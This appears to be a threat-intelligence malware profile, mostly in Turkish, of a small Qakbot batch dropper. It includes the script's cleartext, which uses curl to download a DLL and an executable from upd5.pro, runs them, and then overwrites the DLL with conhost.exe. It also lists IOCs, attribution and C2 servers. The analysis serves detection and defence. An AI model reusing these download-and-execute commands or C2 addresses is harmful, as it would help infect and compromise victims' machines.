Dosya Kimligi
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Format | Windows Batch Script (.bat) |
| Boyut | 326 byte — minimal dropper |
Cleartext Batch Script Icerik
echo "-> Loading update 2..." curl -o 02.dll https://upd5.pro/update/02.dll rundll32.exe 02.dll,checkit echo "-> Loading update 2 tool..." curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe qd_x86.exe type c:\Windows\System32\conhost.exe > 02.dll
Analiz
| Adim | Eylem |
|---|---|
| 1 | curl ile C2'den 02.dll indir |
| 2 | rundll32.exe 02.dll,checkit — DLL export checkit ile calistir |
| 3 | curl ile qd_x86.exe indir ve calistir |
| 4 | Anti-Forensics: type conhost.exe > 02.dll — DLL'yi mesgru Windows dosyasıyla uzer! |
C2 Sunucusu
C2 Domain: upd5.pro Payload 1: https://upd5.pro/update/02.dll (Qakbot DLL, export: checkit) Payload 2: https://upd5.pro/update/qd_x86.exe (ikinci asama PE)
Qakbot Hakkinda
Qakbot (Qbot), 2007 yilinda baslayan ve 2023 FBI "Operation Duck Hunt" operasyonuyla altyapisi cokutulen bir banking botnet ailesidir. Ransomware operasyonlari icin (Conti, ProLock, Egregor) ilk erisim saglayici olarak yaygin kullanilmistir. Black Basta ve REvil ile calisma gecmisi bulunmaktadir. 2024'te yeniden aktif hale geldigi gozlemlenmistir.
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 Domain | upd5.pro |
| DLL URL | https://upd5.pro/update/02.dll (checkit) |
| EXE URL | https://upd5.pro/update/qd_x86.exe |
| Anti-Forensics | conhost.exe ile DLL uzerine yazma |
QakBot — Malware Profile
QakBot Quakbot banker. Notesvb.msi delivery. Named pipe IPC. Modular architecture.
Technical Details
QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.
Attribution / Threat Actor
Gold Lagoon, TA570 (Shatak)
Capabilities & Behavior
IOC List (1 indicators)
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
| Type | Value | Note |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
C2 Servers (8 recorded servers for this family)
| Address | Type | Port | Protocol | Status | Country |
|---|---|---|---|---|---|
| 95.217.35.154 | ip | 443 | HTTPS | inactive | FI |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| metasta.me | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| amacey.com | domain | 443 | HTTPS | inactive | — |
| 181.174.165.208 | ip | 443 | HTTPS | sinkholed | AR |
| 212.117.180.232 | ip | 443 | HTTPS | sinkholed | CH |
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.